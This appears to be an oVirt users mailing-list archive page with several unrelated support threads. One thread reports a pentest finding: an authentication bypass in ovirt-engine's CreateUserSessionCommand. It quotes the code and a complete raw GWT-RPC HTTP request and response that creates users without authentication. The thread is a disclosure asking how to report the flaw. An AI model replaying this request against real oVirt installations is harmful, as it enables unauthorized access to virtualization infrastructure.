The oVirt Counter
by Sandro Bonazzola
Hi, for those who remember the Linux Counter project, if you'd like other
to know you're using oVirt and know some details about your deployment,
here's a way to count you in:
https://ovirt.org/community/ovirt-counter.html
Enjoy!
--
Sandro Bonazzola
MANAGER, SOFTWARE ENGINEERING, EMEA R&D PERFORMANCE & SCALE
Red Hat EMEA <https://www.redhat.com/>
sbonazzo(a)redhat.com
<https://www.redhat.com/>
*Red Hat respects your work life balance. Therefore there is no need to
answer this email out of your office hours.*
9 months
Internal pentest result : Ovirt-engine authentication bypass
by Jirka Simon
Hello ovirt comunity.
We had an internal pentest here and one finding is
*Ovirt-engine authentication bypass.*
Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an
authentication bypass. It is
possible to directly call the CreateUserSessionCommand using runAction
exposed by /ovirt-
engine/webadmin/GenericApiGWTService.
*This action explicitly enables everyone to call it:*
```/
@Override
protected boolean isUserAuthorizedToRunAction() {
return true;
}
/```
The behavior of this call differs based on the
ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
option:
```
/boolean externalSsoEnabled =
EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) :
dbUserDao.getByExternalId(authzName, params.getPrincipalId());/
```
If this option is enabled, usernames are used to locate users. If it's
disabled, the externalId
(which seems to be a randomly generated GUID) is used to locate users.
If the specified user exists, a session is returned for the user. If the
specified user doesn't exist,
the user is created in the system. However, the user doesn't get
assigned any group membership
or rights, therefore the session creation fails because of the missing
Login right.
The attempt to modify the users table can be seen in the SQL error
message when attempting to
use a null value for the username (as the endpoint uses GWT, the payload
is mostly unreadable):
```
/POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1
Host: ovirtm.xxx.xxx.cz
14
Final Report: Results of penetration testing (internal, external, Wi-Fi)
21 December 2023
Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45;
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D
Ovirt-Xsrf-Token:
4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869
7|0|23|https://ovirtm.xxx.xxx.cz/ovirt-
engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT
Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo
n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter
s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm
in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc
edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie
s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2
01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
4|22|0|1|0|1|23|2|0|0|0|
HTTP/1.1 200 OK
Date: Fri, 15 Dec 2023 09:42:35 GMT
Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k mod_auth_gssapi/1.6.1
Expires: Thu, 14 Dec 2023 09:42:35 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly; Max-Age=2147483647;
Expires=Wed, 02-Jan-2092
12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK
Pragma: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
Content-Disposition: attachment
X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794
Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5
Connection: close
//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action
ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org
.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
or/2640515959","ERROR: null value in column \"username\" violates
not-null constraint\n Detail:
Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName,
lastName, internal-authz, null,
, email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15
10:42:35.125994+01, namespace,
firstName(a)internal-authz).\n Where: SQL statement \"UPDATE users\n SET
department \u003D
v_department,\n domain \u003D v_domain,\n email \u003D v_email,\n name
\u003D
v_name,\n note \u003D v_note,\n surname \u003D v_surname,\n username \u003D
v_username,\n external_id \u003D v_external_id,\n namespace \u003D
v_namespace,\n
_update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D
v_external_id\n AND domain
\u003D v_domain\"\nPL/pgSQL function updateuserimpl(character
varying,character varying,character
varying,character varying,character varying,character
varying,uuid,character varying,text,character
varying) line 5 at SQL statement\nSQL statement \"SELECT
UpdateUserImpl(\n v_department,\n
v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n
v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function
updateuser(character
varying,character varying,character varying,character varying,character
varying,character
varying,uuid,character varying,boolean,text,character varying) line 3 at
PERFORM"],0,7]/
```
Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO
configuration was
set to false, so to create a session for the admin it would be necessary
to know the admin's user
externalId. However, as this is not the default configuration, it is
possible that a later
reinstallation could change the value. Still, it was possible to create
users in the system without
any authentication.
What is the best way to report this security issue?
Thank you
Jirka
9 months, 1 week
can hosted engine deploy use local repository mirrors instead of internet ones?
by iucounu@gmail.com
Hi,
hosted-engine --deploy is failing as it is trying to connect to mirrorlist.centos.org:
[ INFO ] TASK [ovirt.ovirt.engine_setup : Install required packages for oVirt Engine deployment]
[ INFO ] ok: [localhost]
[ INFO ] TASK [ovirt.ovirt.engine_setup : Install oVirt Engine package]
[ ERROR ] fatal: [localhost -> 192.168.1.187]: FAILED! => {"changed": false, "msg": "Failed to download metadata for repo 'centos-ceph-pacific': Cannot prepare internal mirrorlist: Curl error (7): Couldn't connect to server for http://mirrorlist.centos.org/?release=8-stream&arch=x86_64&repo=storage-c... [Failed to connect to mirrorlist.centos.org port 80: Connection refused]", "rc": 1, "results": []}
Opening up access to the internet is a bureaucratic procedure for us, as would be for adding all the URLs to the proxy. We have a lot of repos mirrored locally - is it possible to get hosted-engine to use the local ones? Is there a list? I had a search for files that might contain these repos in various places, but to no avail.
Thanks for any help!
Cam
9 months, 3 weeks
Nested Virtualization in AMD Ryzen
by LS CHENG
Hi all
I am running OLVM 4.5, this is a test setup which was running in my old
workstation with Intel CPU and is nested virtualization (with VMWare
Workstation), the host was running Windows 7 x64, I moved to AMD Ryzen
7950X3D a couple of days ago which runs Windows 11 x64 with 128GB memory
then moved OLVM VM's from the old workstation to this new workstation.
The problem I face now is the KVM hosts shows this error
*Host kvm1 moved to Non-Operational state as host CPU type is not supported
in this cluster compatibility version or is not supported at all*
I modified /etc/modprobe.d/kvm.conf and changed
options kvm_amd nested=0
to
options kvm_amd nested=1
reboot the kvm host but still getting same error, I verified the
modification and seems good
[root@kvm1 ~]# cat /sys/module/kvm_amd/parameters/nested
1
In Windows 11 I have hyper-v off and Memory Integrity is also off.
Am I missing any additional steps?
Thanks
9 months, 3 weeks
Upgrade from oVirt 4.5.4 to oVirt 4.5.5 - nothing provides selinux-policy >= 38.1.27-1.el9
by Devin A. Bougie
Hi, All. We're having trouble updating our 4.5.4 cluster to 4.5.5. We're running a self-hosted engine on fully updated AlmaLinux 9 hosts, and get the following errors when trying to upgrade to 4.5.5.
Any suggestions would be greatly appreciated.
Many thanks,
Devin
------
[root@lnxvirt01 ~]# dnf clean all
157 files removed
[root@lnxvirt01 ~]# dnf update
CLASSE Packages - x86_64 36 MB/s | 569 kB 00:00
CentOS-9-stream - Ceph Pacific 839 kB/s | 557 kB 00:00
CentOS-9-stream - Gluster 10 240 kB/s | 56 kB 00:00
CentOS-9 - RabbitMQ 38 354 kB/s | 104 kB 00:00
CentOS Stream 9 - NFV OpenvSwitch 923 kB/s | 154 kB 00:00
CentOS-9 - OpenStack yoga 5.7 MB/s | 3.0 MB 00:00
CentOS Stream 9 - OpsTools - collectd 228 kB/s | 51 kB 00:00
CentOS Stream 9 - oVirt 4.5 6.2 MB/s | 1.0 MB 00:00
oVirt upstream for CentOS Stream 9 - oVirt 4.5 1.0 kB/s | 7.5 kB 00:07
AlmaLinux 9 - AppStream 87 MB/s | 7.7 MB 00:00
AlmaLinux 9 - BaseOS 72 MB/s | 2.4 MB 00:00
AlmaLinux 9 - BaseOS - Debug 9.9 MB/s | 1.9 MB 00:00
AlmaLinux 9 - CRB 67 MB/s | 2.3 MB 00:00
AlmaLinux 9 - Extras 1.5 MB/s | 17 kB 00:00
AlmaLinux 9 - HighAvailability 29 MB/s | 434 kB 00:00
AlmaLinux 9 - NFV 56 MB/s | 1.0 MB 00:00
AlmaLinux 9 - Plus 2.5 MB/s | 22 kB 00:00
AlmaLinux 9 - ResilientStorage 30 MB/s | 446 kB 00:00
AlmaLinux 9 - RT 53 MB/s | 1.0 MB 00:00
AlmaLinux 9 - SAP 874 kB/s | 9.7 kB 00:00
AlmaLinux 9 - SAPHANA 1.3 MB/s | 13 kB 00:00
Error:
Problem 1: cannot install the best update candidate for package ovirt-vmconsole-1.0.9-1.el9.noarch
- nothing provides selinux-policy >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
- nothing provides selinux-policy-base >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
Problem 2: package ovirt-vmconsole-host-1.0.9-3.el9.noarch from centos-ovirt45 requires ovirt-vmconsole = 1.0.9-3.el9, but none of the providers can be installed
- cannot install the best update candidate for package ovirt-vmconsole-host-1.0.9-1.el9.noarch
- nothing provides selinux-policy >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
- nothing provides selinux-policy-base >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
(try to add '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages)
------
9 months, 3 weeks
Major screwup and now I can't bring anything up
by John Florian
I have a small home oVirt 4.5 deployment that was struggling a bit and I think I've only made things worse. I was seeing some SSL errors in various places but couldn't find any evidence of an expired cert though maybe I overlooked something. At present, it looks like the most immediate problem is that the engine.log is showing SyncNetworkProviderCommand fails saying EngineException: (Failed with error Unsupported or unrecognized SSL message and code 5050). For now, I'm only concerning myself to one Host that had been running VMs until I tried restarting everything from a power off. I take it that the sync failure prevents this Host from becoming active.
I had successfully been using this setup for many years. I do have my own web cert on the engine signed by my CA. While I was getting this same "code 5050" error before with things like ovirt-imageio (what prompted my initial digging), now I'm afraid I've only made things more complex. See, I was running FreeIPA on a pair of VMs. In the past, this pair of VMs would auto-start once the oVirt Engine and Hosts were going and I had no issue. But now I wonder to what extent OSCP being unreachable might affect the SSL errors.
What's the best/easiest/safest way out of this mess? Should I just wipe ovirt-engine of all the non-rpm provided files in /etc/pki/ovirt-engine/ and redo the engine-setup? I'm afraid of making things worse before I begin attempting that.
9 months, 3 weeks
Re: [ovirt-devel] Foreman needs a release of ovirt-engine-sdk-ruby
by Guillaume Pavese
We were just starting to depend on this workflow...
On Fri, Jan 26, 2024 at 2:02 PM Ewoud Kohl van Wijngaarden <
ewoud+ovirt(a)kohlvanwijngaarden.nl> wrote:
> Hello everyone,
>
> Foreman is a bit late in updating Ruby to a newer version. Looking ahead
> we're aiming at Ruby 3.1+ but ovirt-engine-sdk-ruby doesn't compile on
> it.
>
> https://github.com/oVirt/ovirt-engine-sdk-ruby/pull/3 was merged in
> September 2022 and a request to release it was opened a year ago:
> https://github.com/oVirt/ovirt-engine-sdk-ruby/issues/4
>
> The Foreman community is currently discussing dropping oVirt support:
> https://community.theforeman.org/t/proposal-to-drop-support-for-ovirt/36324
>
> Is there anyone who can still perform this release, or should we proceed
> with removal?
>
> Regards,
> Ewoud Kohl van Wijngaarden
> _______________________________________________
> Devel mailing list -- devel(a)ovirt.org
> To unsubscribe send an email to devel-leave(a)ovirt.org
> Privacy Statement: https://www.ovirt.org/privacy-policy.html
> oVirt Code of Conduct:
> https://www.ovirt.org/community/about/community-guidelines/
> List Archives:
> https://lists.ovirt.org/archives/list/devel@ovirt.org/message/ESA4LFSQ5JP...
>
--
Ce message et toutes les pièces jointes (ci-après le “message”) sont
établis à l’intention exclusive de ses destinataires et sont confidentiels.
Si vous recevez ce message par erreur, merci de le détruire et d’en avertir
immédiatement l’expéditeur. Toute utilisation de ce message non conforme a
sa destination, toute diffusion ou toute publication, totale ou partielle,
est interdite, sauf autorisation expresse. L’internet ne permettant pas
d’assurer l’intégrité de ce message . Interactiv-group (et ses filiales)
décline(nt) toute responsabilité au titre de ce message, dans l’hypothèse
ou il aurait été modifié. IT, ES, UK.
<https://interactiv-group.com/disclaimer.html>
9 months, 3 weeks
Cannot remove Snapshot. The VM is during a backup operation.
by and@missme.ro
Hello!
Running ovirt Version 4.5.5-1.el8
I had an issue with the iscsi server during the backup and I have two VMs that cannot be backed up anymore by Veeam.
In the ovirt event log i have the following errors:
Snapshot 'Auto-generated for Backup VM' creation for VM 'dns-a' has been completed.
VDSM ovirt1-02 command StartNbdServerVDS failed: Bitmap does not exist: "{'reason': 'Bitmap does not exist in /rhev/data-center/mnt/blockSD/b2fa3469-a380-4180-a89a-43d65085d1b9/images/6a4de98a-b544-4df8-beb1-e560fd61c0e6/cdb26b8b-c447-48de-affa-d7f778aebac7', 'bitmap': '12d2fb20-74da-4e63-b240-f1a42210760c'}"
Transfer was stopped by system. Reason: failed to create a signed image ticket.
Image Download with disk dns-a_Disk1 was initiated by veeam@internal-authz
Image Download with disk dns-a_Disk1 was cancelled.
The error on the Veeam backup proxy:
dns-a: Unable to create image transfer: Reason: 'Operation Failed', Detail: '[]'
When trying to delete the snapshot from the administration interface I receive the following error in the web interface (and nothing gets logged in the event log)
Cannot remove Snapshot. The VM is during a backup operation.
How should I go about fixing this issue?
9 months, 3 weeks
